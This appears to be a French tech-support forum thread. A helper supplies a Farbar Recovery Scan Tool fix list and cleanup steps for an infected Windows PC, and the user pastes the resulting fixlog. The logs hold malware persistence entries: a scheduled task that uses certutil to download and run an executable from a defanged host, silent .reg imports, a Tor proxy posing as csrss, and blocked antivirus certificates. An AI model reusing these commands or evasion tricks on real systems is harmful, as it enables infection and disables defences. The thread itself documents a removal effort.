2018-05-24 01:44 - 2018-05-24 01:44 - 000000000 ____D C:\ProgramData\yahoochrome_D
2018-05-24 01:43 - 2018-05-24 01:43 - 000278508 _____ C:\Users\2s\AppData\Local\K-is.bin
2018-05-24 01:43 - 2018-05-24 01:41 - 002136576 _____ (TODO: <Company name>) C:\Users\2s\AppData\Local\Dongtom.exe
2018-05-24 01:42 - 2018-06-02 21:02 - 000003588 _____ C:\WINDOWS\System32\Tasks\ScheduledUpdate
2018-05-24 01:42 - 2018-06-02 21:02 - 000003258 _____ C:\WINDOWS\System32\Tasks\csrss
2018-05-24 01:42 - 2018-06-02 16:40 - 000000000 ___HD C:\WINDOWS\rss
2018-05-24 01:41 - 2018-05-24 21:42 - 000929792 _____ C:\Users\2s\AppData\Local\sham.db
2018-05-24 01:41 - 2018-05-24 01:52 - 000000414 _____ C:\WINDOWS\Tasks\Updater_Online_Application.job
2018-05-24 01:41 - 2018-05-24 01:52 - 000000382 _____ C:\WINDOWS\Tasks\Online Application V2G6.job
2018-05-24 01:41 - 2018-05-24 01:52 - 000000382 _____ C:\WINDOWS\Tasks\Online Application V2G5.job
2018-05-24 01:41 - 2018-05-24 01:52 - 000000382 _____ C:\WINDOWS\Tasks\Online Application V2G4.job
2018-05-24 01:41 - 2018-05-24 01:52 - 000000382 _____ C:\WINDOWS\Tasks\Online Application V2G3.job
2018-05-24 01:41 - 2018-05-24 01:52 - 000000382 _____ C:\WINDOWS\Tasks\Online Application V2G2.job
2018-05-24 01:41 - 2018-05-24 01:52 - 000000382 _____ C:\WINDOWS\Tasks\Online Application V2G1.job
2018-05-24 01:41 - 2018-05-24 01:41 - 000003308 _____ C:\WINDOWS\System32\Tasks\Updater_Online_Application
2018-05-24 01:41 - 2018-05-24 01:41 - 000003272 _____ C:\WINDOWS\System32\Tasks\Online Application V2G6
2018-05-24 01:41 - 2018-05-24 01:41 - 000003272 _____ C:\WINDOWS\System32\Tasks\Online Application V2G5
2018-05-24 01:41 - 2018-05-24 01:41 - 000003272 _____ C:\WINDOWS\System32\Tasks\Online Application V2G4
2018-05-24 01:41 - 2018-05-24 01:41 - 000003272 _____ C:\WINDOWS\System32\Tasks\Online Application V2G3
2018-05-24 01:41 - 2018-05-24 01:41 - 000003272 _____ C:\WINDOWS\System32\Tasks\Online Application V2G2
2018-05-24 01:41 - 2018-05-24 01:41 - 000003272 _____ C:\WINDOWS\System32\Tasks\Online Application V2G1
2018-05-24 01:39 - 2018-05-24 01:42 - 000000000 ____D C:\Program Files (x86)\foldershare
2018-05-24 01:38 - 2018-05-24 01:38 - 000000000 ____D C:\Users\Public\Documents\XMUpdate
2018-05-24 00:23 - 2018-05-24 00:23 - 000000000 ____D C:\Program Files\AutoCAD 2010
2018-05-24 00:15 - 2018-06-02 16:48 - 000004170 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{3392FECE-DEB2-4177-8D46-BABD458AA14F}
2018-05-24 00:07 - 2018-05-24 00:08 - 000000000 ____D C:\ProgramData\FLEXnet
EmptyTemp:
RemoveProxy:
Reboot:

Enregistre le contenu par le menu fichier puis enregistrer.

Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.

2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :

Réparer Mozilla Firefox (premier paragraphe)
Réparer Google Chrome (seulement le premier paragraphe).
Réinitialiser et réparer Internet Explorer

3°)
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite

4°)
Vois ce que cela donne et si des améliorations ont eu lieu.
Si ce n'est pas le cas, si tu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.
Refais un scan FRST et donne les nouveaux rapports via pjjoint.

Réponse 2 / 3

saidclecde Messages postés 4 Date d'inscription Statut Membre Dernière intervention

voila le contenu du fichier fixlog

Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 02.06.2018
Exécuté par 2s (03-06-2018 14:15:14) Run:1
Exécuté depuis C:\Users\2s\Desktop
Profils chargés: 2s (Profils disponibles: defaultuser0 & 2s)
Mode d'amorçage: Normal
==============================================

fixlist contenu:

CreateRestorePoint:
CloseProcesses:
Task: {0E8B2C56-528C-4945-BB6B-F1F0489A2658} - System32\Tasks\Online Application V2G4 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: {124B9B29-B301-4BB9-8FEF-5B9DA72F02FE} - System32\Tasks\RuvZlWnxKNkmGuM2 => rundll32 "C:\Program Files (x86)\KCGHGVOnU\arGmRu.dll",#1
Task: {14C243B6-F63D-4EBB-B922-F9E7A98E93F8} - System32\Tasks\psv_Sailcore => cmd.exe /c regedit.exe /s "C:\ProgramData\Voyasollam\Blueflex.reg" & del "C:\ProgramData\Voyasollam\Blueflex.reg" & SCHTASKS /Delete /TN "psv_Sailcore" /F <==== ATTENTION
Task: {184DFF65-5562-436A-BBC1-6D1B3A704D95} - System32\Tasks\psv_GeoSailfax => cmd.exe /c regedit.exe /s "C:\ProgramData\Voyasollam\Tempotnix.reg" & del "C:\ProgramData\Voyasollam\Tempotnix.reg" & SCHTASKS /Delete /TN "psv_GeoSailfax" /F <==== ATTENTION
Task: {217F1DD6-FB2C-40C0-AA0A-AB4B1B094ECD} - System32\Tasks\KnPQHVchzdGfrlHaz2 => rundll32 "C:\Program Files (x86)\OxoywZINBbQwrioRGrR\EZomjhb.dll",#1
Task: {23DC4AC2-D7E0-464B-A54C-D01A748D95A2} - System32\Tasks\Online Application V2G1 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: {298639F9-958A-412D-93BC-0DFBCF1F5E68} - System32\Tasks\wAJDAAZgOBCdyQgsK2 => rundll32 "C:\Program Files (x86)\VfXyqasRzlGpJFtgwyR\KIWKmbE.dll",#1
Task: {2BB4F419-83CC-4C8E-9B17-30DD03213B44} - System32\Tasks\IP Relub => C:\WINDOWS\system32\rundll32.exe "C:\Program Files\IP Relub\IP Relub.dll",tNHiHMuCjemR <==== ATTENTION
Task: {2E39416B-8542-4870-A25C-08BE631A36DF} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.14.17639.18041-0\MpCmdRun.exe [2018-04-26] (Microsoft Corporation)
Task: {3481D7F0-4DEC-43BC-B2DC-0AC8C7F143AC} - System32\Tasks\psv_ZoomEco => cmd.exe /c regedit.exe /s "C:\ProgramData\Subair\Matphase.reg" & del "C:\ProgramData\Subair\Matphase.reg" & SCHTASKS /Delete /TN "psv_ZoomEco" /F <==== ATTENTION
Task: {4244D09C-E4EC-4F2D-9B86-08B899721340} - System32\Tasks\Online Application V2G3 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: {4C32DD45-9B88-43FB-A121-E846A3C36741} - System32\Tasks\psv_Solo-Stock => cmd.exe /c regedit.exe /s "C:\ProgramData\Subair\RanJob.reg" & del "C:\ProgramData\Subair\RanJob.reg" & SCHTASKS /Delete /TN "psv_Solo-Stock" /F <==== ATTENTION
R2 TCPSvc; "C:\Users\2s\AppData\Local\Temp\csrss\proxy\tor.exe" --nt-service -f "C:\Users\2s\AppData\Local\Temp\csrss\proxy\config" --Log "notice file C:\Users\2s\AppData\Local\Temp\csrss\proxy\t" <==== ATTENTION
S2 Voyasollam; C:\ProgramData\\Voyasollam\\Voyasollam.exe shuz -f "C:\ProgramData\\Voyasollam\\Voyasollam.dat" -l -a
R2 ZAMSvc; C:\Program Files (x86)\MalwareFox AntiMalware\ZAM.exe [15767792 2018-05-24] (Copyright 2017.)
S2 saiyitechnology; C:\ProgramData\yahoochrome_D\desktop245.exe [517432 2018-05-21] (PandaViewer)
R2 PDF24; C:\Program Files (x86)\PDF24\pdf24.exe [218248 2016-11-15] (Geek Software GmbH)
Task: {4D47D321-6F4D-45E5-BB4E-AF32EC95D150} - System32\Tasks\Online Application V2G5 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: {4FBA52DD-AF42-4843-9B70-E96CDC034E78} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2012-10-01] (Microsoft Corporation)
Task: {54DC5A95-C460-4DDF-A623-A90AA916334D} - System32\Tasks\rArHIXNWKfbeRtR2 => rundll32 "C:\Program Files (x86)\EgDGbQEiU\mNcAyB.dll",#1
Task: {5D643E51-495D-4418-88F1-86DAA772BCB1} - System32\Tasks\csrss => C:\WINDOWS\rss\csrss.exe [2018-05-24] () <==== ATTENTION
Task: {5FD2DA35-7BDC-41A4-9B6F-5DB4554BDEAA} - System32\Tasks\Microsoft\Windows\Setup\EOSNotify => C:\WINDOWS\system32\EOSNotify.exe
Task: {60A721D3-0B62-470B-B840-FFF528DB135C} - System32\Tasks\jbDyCmJOWCzWzi => rundll32 "C:\Program Files (x86)\EPVqpVJyVSWU2\SakrLGEmTRZuK.dll",#1
Task: {61784FEE-4B60-4356-AA82-A1984791B93D} - System32\Tasks\TdqeVjasHzsikvrWtEm2 => rundll32 "C:\Program Files (x86)\wCCFxMJCsZmzC\ClHKBUk.dll",#1
Task: {A352E386-05D2-4ADC-A152-309444E9479D} - System32\Tasks\psv_JobGocof => cmd.exe /c regedit.exe /s "C:\ProgramData\Voyasollam\Duodox.reg" & del "C:\ProgramData\Voyasollam\Duodox.reg" & SCHTASKS /Delete /TN "psv_JobGocof" /F <==== ATTENTION
Task: {BAFE10EA-7284-4529-B67C-67005EC6394F} - \FastDataX Task -> Pas de fichier <==== ATTENTION
Task: {BEA2DD67-BB47-489A-8D48-1DE709CBF7F5} - System32\Tasks\psv_TresDancof => cmd.exe /c regedit.exe /s "C:\ProgramData\Subair\Vaiatom.reg" & del "C:\ProgramData\Subair\Vaiatom.reg" & SCHTASKS /Delete /TN "psv_TresDancof" /F <==== ATTENTION
Task: {C45E16FE-8ED9-4B3F-99C9-CA2B42FAC904} - System32\Tasks\psv_FreshRemtax => cmd.exe /c regedit.exe /s "C:\ProgramData\Subair\Xxx-lax.reg" & del "C:\ProgramData\Subair\Xxx-lax.reg" & SCHTASKS /Delete /TN "psv_FreshRemtax" /F <==== ATTENTION
Task: {C5A4DD32-4C84-485A-A6CC-92991A4EFD8E} - System32\Tasks\TUZwhpCbnzWcBoUhWSI2 => rundll32 "C:\Program Files (x86)\SvnSzzIscGyUC\PzsFxQr.dll",#1
Task: {C628122E-598C-4A56-94E8-301E43055366} - \ReimageUpdater -> Pas de fichier <==== ATTENTION
Task: {C6A04AF6-6652-4F3E-B043-B0FCAC0F17EE} - System32\Tasks\psv_FixSing => cmd.exe /c regedit.exe /s "C:\ProgramData\Voyasollam\TechOveeco.reg" & del "C:\ProgramData\Voyasollam\TechOveeco.reg" & SCHTASKS /Delete /TN "psv_FixSing" /F <==== ATTENTION
Task: {C7E9B9E5-7022-4F87-BB31-D933E65232DD} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/4/app.exe C:\Users\2s\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\2s\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {DD27E196-CB64-4839-AE0B-1C77E6B0DF51} - System32\Tasks\XLqsfoKFUKuTqG => rundll32 "C:\Program Files (x86)\ijcQGTqqPStU2\VmANycSAtyYBS.dll",#1
Task: {DF3C198D-B30D-45AD-8584-AAFB8B881A21} - System32\Tasks\Online Application V2G2 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: {DFEC916E-0BE3-4D71-B4F3-D698BBBD67BA} - System32\Tasks\Online Application V2G6 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: {E9FFBC4A-6E3B-4009-9536-2CFDCED7DDDF} - System32\Tasks\psv_ZumApron => cmd.exe /c regedit.exe /s "C:\ProgramData\Subair\OverSanfix.reg" & del "C:\ProgramData\Subair\OverSanfix.reg" & SCHTASKS /Delete /TN "psv_ZumApron" /F <==== ATTENTION
Task: {EBBD806D-C2EE-4C13-872B-84B138CA783D} - System32\Tasks\Updater_Online_Application => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe <==== ATTENTION
Task: {EC92AAEA-6472-49BB-8C13-A08C4A03BA48} - System32\Tasks\psv_Scot-Lam => cmd.exe /c regedit.exe /s "C:\ProgramData\Voyasollam\Subsonkix.reg" & del "C:\ProgramData\Voyasollam\Subsonkix.reg" & SCHTASKS /Delete /TN "psv_Scot-Lam" /F <==== ATTENTION
Task: {F53ED0B5-E862-432F-A8D7-5A473438B4AD} - System32\Tasks\WobUIKhuMtTTi2 => C:\WINDOWS\system32\wscript.exe "C:\ProgramData\XjOPTLXDzAynQaVB\WGVYbGg.wsf"
Task: {F9A5FEF7-2409-4967-B010-E3827FE969B1} - System32\Tasks\ImpoperViewer => C:\WINDOWS\system32\rundll32.exe "C:\Program Files\ImpoperViewer\ImpoperViewer.dll",TSuwoSt <==== ATTENTION
HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) <==== ATTENTION
HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) <==== ATTENTION
HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== ATTENTION
HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) <==== ATTENTION
HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== ATTENTION
HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== ATTENTION
HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== ATTENTION
HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) <==== ATTENTION
HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) <==== ATTENTION
HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== ATTENTION
HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) <==== ATTENTION
HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== ATTENTION
HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) <==== ATTENTION
HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) <==== ATTENTION
HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== ATTENTION
HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== ATTENTION
HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ATTENTION
HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) <==== ATTENTION
HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== ATTENTION
HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) <==== ATTENTION
HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== ATTENTION
HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) <==== ATTENTION
HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== ATTENTION
HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) <==== ATTENTION
HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1591057960-2417521308-250896843-1002\...\Run: [BillowingWind] => C:\WINDOWS\rss\csrss.exe [3189248 2018-05-24] () <==== ATTENTION
HKU\S-1-5-21-1591057960-2417521308-250896843-1002\...\Run: [A1DADOPPE8F6HAO] => "C:\Program Files\GMWX1Q6NX4\GMWX1Q6NX.exe"
HKU\S-1-5-21-1591057960-2417521308-250896843-1002\...\Run: [CloudNet] => C:\Users\2s\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [680960 2018-06-02] (EpicNet Inc.)
HKU\S-1-5-21-1591057960-2417521308-250896843-1002\...\Policies\Explorer: []
HKU\S-1-5-21-1591057960-2417521308-250896843-1002\...\MountPoints2: {68f97705-51f3-11e8-9d02-9822ef1caefe} - "D:\Setup.exe" /s
AppInit_DLLs: C:\ProgramData\Subair\Zamtough.dll => Pas de fichier
AppInit_DLLs-x32: C:\ProgramData\Subair\Matcom.dll => Pas de fichier
2018-06-02 21:29 - 2018-06-02 21:29 - 000072816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\jesqkqqi.sys
2018-06-02 21:22 - 2018-06-02 21:27 - 008206624 _____ (Malwarebytes) C:\Users\2s\Desktop\adwcleaner-7-0-7-0.exe
2018-06-02 21:12 - 2018-06-02 21:12 - 000000000 ____D C:\Users\2s\AppData\Local\ElevatedDiagnostics
2018-06-02 21:11 - 2018-06-02 21:11 - 000072816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wccmctpk.sys
2018-06-02 21:08 - 2018-06-02 21:08 - 000072816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wivzpefe.sys
2018-06-02 21:04 - 2018-06-02 21:04 - 000072816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hzmsqsbe.sys
2018-06-02 18:05 - 2018-06-02 18:05 - 000000000 ____D C:\Program Files (x86)\ATF_Cleaner
2018-06-02 17:42 - 2018-06-02 17:42 - 000003212 _____ C:\WINDOWS\System32\Tasks\XLqsfoKFUKuTqG
2018-06-02 17:42 - 2018-06-02 17:42 - 000003044 _____ C:\WINDOWS\System32\Tasks\WobUIKhuMtTTi2
2018-06-02 17:42 - 2018-06-02 17:42 - 000003034 _____ C:\WINDOWS\System32\Tasks\KnPQHVchzdGfrlHaz2
2018-06-02 17:42 - 2018-06-02 17:42 - 000003026 _____ C:\WINDOWS\System32\Tasks\TdqeVjasHzsikvrWtEm2
2018-06-02 17:42 - 2018-06-02 17:42 - 000003008 _____ C:\WINDOWS\System32\Tasks\rArHIXNWKfbeRtR2
2018-06-02 17:42 - 2018-06-02 17:42 - 000000000 ____D C:\ProgramData\XjOPTLXDzAynQaVB
2018-06-02 17:42 - 2018-06-02 17:42 - 000000000 ____D C:\Program Files (x86)\wCCFxMJCsZmzC
2018-06-02 17:42 - 2018-06-02 17:42 - 000000000 ____D C:\Program Files (x86)\OxoywZINBbQwrioRGrR
2018-06-02 17:42 - 2018-06-02 17:42 - 000000000 ____D C:\Program Files (x86)\lJFUJMGEHIE
2018-06-02 17:42 - 2018-06-02 17:42 - 000000000 ____D C:\Program Files (x86)\iRmKFyAZyPUn
2018-06-02 17:42 - 2018-06-02 17:42 - 000000000 ____D C:\Program Files (x86)\ijcQGTqqPStU2
2018-06-02 17:41 - 2018-06-02 20:59 - 000000000 ____D C:\Users\2s\AppData\Roaming\gpbxpbqxmdw
2018-06-02 17:41 - 2018-06-02 17:42 - 000000000 ____D C:\Program Files (x86)\EgDGbQEiU
2018-06-02 17:41 - 2018-06-02 17:41 - 000000000 ____D C:\Program Files\YTZTX5HWMR
2018-06-02 17:05 - 2018-06-02 20:59 - 000000000 ____D C:\Users\2s\AppData\Roaming\uziyf0umul5
2018-06-02 17:05 - 2018-06-02 18:31 - 000000000 ____D C:\Program Files\FH98R5I5YJ
2018-06-02 16:42 - 2018-06-02 20:59 - 000000000 ____D C:\Users\2s\AppData\Roaming\raj0v241spm
2018-06-02 16:42 - 2018-06-02 18:31 - 000000000 ____D C:\Program Files\8Z4GUCKJPK
2018-05-27 14:07 - 2018-05-27 14:07 - 000000000 ____D C:\ProgramData\Microsoft Toolkit
2018-05-27 14:06 - 2018-05-27 14:06 - 000004857 _____ C:\Users\2s\Desktop\MTKV263.zip
2018-05-25 06:20 - 2018-05-25 06:21 - 000366912 _____ C:\Users\2s\Desktop\Devis de prestation de service (Pour Elexpert) (1).pdf
2018-05-25 01:34 - 2018-05-25 01:57 - 000000000 ____D C:\WINDOWS\system32\appmgmt
2018-05-24 23:32 - 2018-06-02 18:17 - 000000000 ____D C:\Program Files\IDFYG9HHO5
2018-05-24 22:48 - 2018-06-02 18:17 - 000000000 ____D C:\Program Files\6Y39LUKVBJ
2018-05-24 22:34 - 2018-05-24 22:34 - 000002414 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2018-05-24 22:13 - 2018-05-24 22:13 - 000003588 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2018-05-24 22:13 - 2018-05-24 22:13 - 000003464 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2018-05-24 22:10 - 2018-05-24 22:13 - 000000000 ____D C:\Users\2s\AppData\Local\Deployment
2018-05-24 22:10 - 2018-05-24 22:10 - 000000000 ____D C:\Users\2s\AppData\Local\Apps\2.0
2018-05-24 22:08 - 2018-06-02 16:44 - 000000000 ____D C:\Program Files (x86)\JAcqddADqIE
2018-05-24 22:08 - 2018-06-02 16:38 - 000000000 ____D C:\Program Files (x86)\NExnNAYCpUUn
2018-05-24 22:08 - 2018-05-24 22:08 - 000000000 ____D C:\Program Files (x86)\VfXyqasRzlGpJFtgwyR
2018-05-24 22:08 - 2018-05-24 22:08 - 000000000 ____D C:\Program Files (x86)\SvnSzzIscGyUC
2018-05-24 22:08 - 2018-05-24 22:08 - 000000000 ____D C:\Program Files (x86)\EPVqpVJyVSWU2
2018-05-24 22:07 - 2018-05-24 22:08 - 000000000 ____D C:\Program Files (x86)\KCGHGVOnU
2018-05-24 22:05 - 2018-03-24 14:51 - 002990080 _____ C:\WINDOWS\system32\mcicda64.dll
2018-05-24 22:03 - 2018-06-02 20:59 - 000000000 ____D C:\Users\2s\AppData\Roaming\2pqqlm5b2kp
2018-05-24 21:54 - 2018-06-02 20:59 - 000000000 ____D C:\Users\2s\AppData\Roaming\r5dqdoik5wr
2018-05-24 21:44 - 2018-05-24 22:08 - 000003034 _____ C:\WINDOWS\System32\Tasks\wAJDAAZgOBCdyQgsK2
2018-05-24 21:44 - 2018-05-24 22:08 - 000003026 _____ C:\WINDOWS\System32\Tasks\TUZwhpCbnzWcBoUhWSI2
2018-05-24 21:42 - 2018-06-02 16:38 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MalwareFox AntiMalware
2018-05-24 21:36 - 2018-06-02 21:43 - 000406048 _____ C:\WINDOWS\ZAM.krnl.trace
2018-05-24 21:36 - 2018-06-02 21:43 - 000085779 _____ C:\WINDOWS\ZAM_Guard.krnl.trace
2018-05-24 21:36 - 2018-06-02 16:38 - 000000000 ____D C:\Program Files (x86)\MalwareFox AntiMalware
2018-05-24 21:36 - 2018-05-24 21:36 - 000203680 _____ (Zemana Ltd.) C:\WINDOWS\system32\Drivers\zamguard64.sys
2018-05-24 21:36 - 2018-05-24 21:36 - 000203680 _____ (Zemana Ltd.) C:\WINDOWS\system32\Drivers\zam64.sys
2018-05-24 21:36 - 2018-05-24 21:36 - 000000000 ____D C:\Users\2s\AppData\Local\Zemana
2018-05-24 21:36 - 2018-05-24 21:36 - 000000000 ____D C:\Users\2s\AppData\Local\Wolf of Webstreet OPC Private Limited
2018-05-24 21:09 - 2018-06-02 18:28 - 000000000 ____D C:\Users\2s\AppData\Roaming\qyxavgbtyty
2018-05-24 20:23 - 2018-06-02 20:59 - 000000000 ____D C:\Users\2s\AppData\Roaming\ffhddztanil
2018-05-24 19:20 - 2018-05-24 19:20 - 000016790 _____ C:\WINDOWS\System32\Tasks\IP Relub
2018-05-24 18:08 - 2018-05-24 18:08 - 000000000 _____ C:\autoexec.bat
2018-05-24 17:44 - 2018-05-24 17:44 - 000000000 ____D C:\Users\2s\AppData\Roaming\SystemHealer
2018-05-24 17:39 - 2018-06-02 16:38 - 000000000 ____D C:\Program Files (x86)\FastDataX
2018-05-24 17:38 - 2018-05-24 17:38 - 000000000 ____D C:\Users\2s\AppData\Roaming\FastDataX
2018-05-24 17:37 - 2018-06-02 20:59 - 000000000 ____D C:\Users\2s\AppData\Roaming\3nk4x03n5t3
2018-05-24 17:18 - 2018-05-24 17:18 - 000000000 ____D C:\Users\2s\AppData\Roaming\Macromedia
2018-05-24 15:54 - 2018-05-24 15:54 - 000016810 _____ C:\WINDOWS\System32\Tasks\ImpoperViewer
2018-05-24 15:46 - 2018-05-24 22:08 - 000003212 _____ C:\WINDOWS\System32\Tasks\jbDyCmJOWCzWzi
2018-05-24 15:46 - 2018-05-24 22:08 - 000003008 _____ C:\WINDOWS\System32\Tasks\RuvZlWnxKNkmGuM2
2018-05-24 15:37 - 2018-06-02 20:59 - 000000000 ____D C:\Users\2s\AppData\Roaming\0hzygrghqs2
2018-05-24 14:49 - 2018-06-02 20:59 - 000000000 ____D C:\Users\2s\AppData\Roaming\ftwdngd03dc
2018-05-24 14:04 - 2018-06-02 20:59 - 000000000 ____D C:\Users\2s\AppData\Roaming\mwugkltykxi
2018-05-24 02:47 - 2018-05-24 02:47 - 000000290 __RSH C:\Users\2s\ntuser.pol
2018-05-24 02:42 - 2018-06-02 21:03 - 000006040 __RSH C:\ProgramData\ntuser.pol
2018-05-24 02:33 - 2018-06-02 20:59 - 000000000 ____D C:\Users\2s\AppData\Roaming\rncxnmqbgrj
2018-05-24 02:28 - 2018-05-24 02:28 - 000003346 _____ C:\WINDOWS\System32\Tasks\psv_FixSing
2018-05-24 02:28 - 2018-05-24 02:28 - 000003342 _____ C:\WINDOWS\System32\Tasks\psv_Sailcore
2018-05-24 02:28 - 2018-05-24 02:28 - 000000000 ____D C:\Users\2s\AppData\Roaming\Mozilla
2018-05-24 02:27 - 2018-05-24 02:27 - 001987661 _____ C:\Users\2s\AppData\Local\Tampzap.tst
2018-05-24 02:27 - 2018-05-24 02:27 - 001895383 _____ C:\Users\2s\AppData\Local\Bamplus.bin
